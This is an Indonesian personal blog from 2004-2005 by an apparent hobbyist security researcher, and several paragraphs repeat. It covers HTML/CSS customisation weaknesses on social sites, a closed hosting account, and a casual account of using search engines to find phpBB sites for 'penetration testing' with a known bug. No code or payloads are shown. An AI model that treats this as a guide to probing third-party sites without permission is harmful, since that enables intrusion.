Terkait dengan kelemahan yang dimiliki hampir oleh semua CMS yang menggunakan [bbcode] serta [html] dan sekali lagi akibat dukungan browser ditambahi dengan maraknya pengijinan yang diberikan oleh penyedia jasa yang memiliki klien yang besar seperti friendster (mengerti gak kenapa fitur "groups" di non-aktifkan sementara ini ?? *_^) , serta 360 (yang dimotori oleh yahoo) yang memberikan keleluasaan terhadap user untuk mengkostumisasi sendiri tampilan halaman yang dimiliki baik dengan tag [html] dan di bungkus dengan CSS, belum lagi semua parsing inputan tidak diberikan verification code sehingga sangat memungkinkan penggunaan *bot untuk membuat sedikit kekacauan
Semua ini hanya gambaran betapa Vulnerable-nya lingkungan (red:dunia maya) kita. No destructive idea , just give some opinion to increase your paranoid level *_^ , Sorry ! No technique in detail !
Terkait dengan kelemahan yang dimiliki hampir oleh semua CMS yang menggunakan [bbcode] serta [html] dan sekali lagi akibat dukungan browser ditambahi dengan maraknya pengijinan yang diberikan oleh penyedia jasa yang memiliki klien yang besar seperti friendster (mengerti gak kenapa fitur "groups" di non-aktifkan sementara ini ?? *_^) , serta 360 (yang dimotori oleh yahoo) yang memberikan keleluasaan terhadap user untuk mengkostumisasi sendiri tampilan halaman yang dimiliki baik dengan tag [html] dan di bungkus dengan CSS, belum lagi semua parsing inputan tidak diberikan verification code sehingga sangat memungkinkan penggunaan *bot untuk membuat sedikit kekacauan
Semua ini hanya gambaran betapa Vulnerable-nya lingkungan (red:dunia maya) kita. No destructive idea , just give some opinion to increase your paranoid level *_^ , Sorry ! No technique in detail !
Thursday, July 28, 2005
wxf.siteburg.com di closed
huex, sadis banget tuh penyedia hosting :) mosok situs wxf di tutup karena di anggap "idle" untuk beberapa waktu yang di tentukan . Emang sih salah gw yang membiarkan gak ada aktifitas , ya namanya juga gratisan :) , sekarnag tinggal wxf.blogsome.com yang menjadi main site untuk Wxf poject. Kerjaan, masalah silih berganti banyak planing yang tertunda dan bahkan tak terlaksana , "Manusia bisa saja berencana, tapi Tuhanlah yang menentukan"
Friday, July 01, 2005
Google(tm) Learn from past mistake
Today, im trying to do some penetration testing to the site that running phpbb as their web forum engine according to the newest bug against it (OMG, it is urldecode in highligter again? , so past exploit will work with "tiny" modification) , As usually im using google(tm) to find some sites. when i hit enter, then it display unusual page of search result.

Yupe, google(tm) learn from their past mistaken, remember about santy worm ? it defaces many sites running phpbb with the same bug . Unfortunatelly !yahoo search engine still manage the result for this search key.

Yupe, google(tm) learn from their past mistaken, remember about santy worm ? it defaces many sites running phpbb with the same bug . Unfortunatelly !yahoo search engine still manage the result for this search key.
Monday, October 18, 2004
PERL its ROCK !!!!!
huehueh, akhirnya sploits terbaru gwa bakal gwa rilis di ezine #8 , mungkin gak bakalan banyak dapet target dengan sploits itu, karena advisoriesnya dah lama gwa rilis dan kebanyakan dah di patch semua :(( . tetapi itukan cuma buat belajar, so gak ada salahnya :)
sploits ini cuma pake ARGV buat ambil inputan sama LWP .pokoknya asik banget dech.. perl its ROCK!! , gwa mo blajar nulis real sploits nih , mo pake format string apa buffer overflow yach , hum yang jelas belajar dulu...kekekeke .. doakan aku berjuang yach teman teman!!
sploits ini cuma pake ARGV buat ambil inputan sama LWP .pokoknya asik banget dech.. perl its ROCK!! , gwa mo blajar nulis real sploits nih , mo pake format string apa buffer overflow yach , hum yang jelas belajar dulu...kekekeke .. doakan aku berjuang yach teman teman!!
Subscribe to:
Posts (Atom)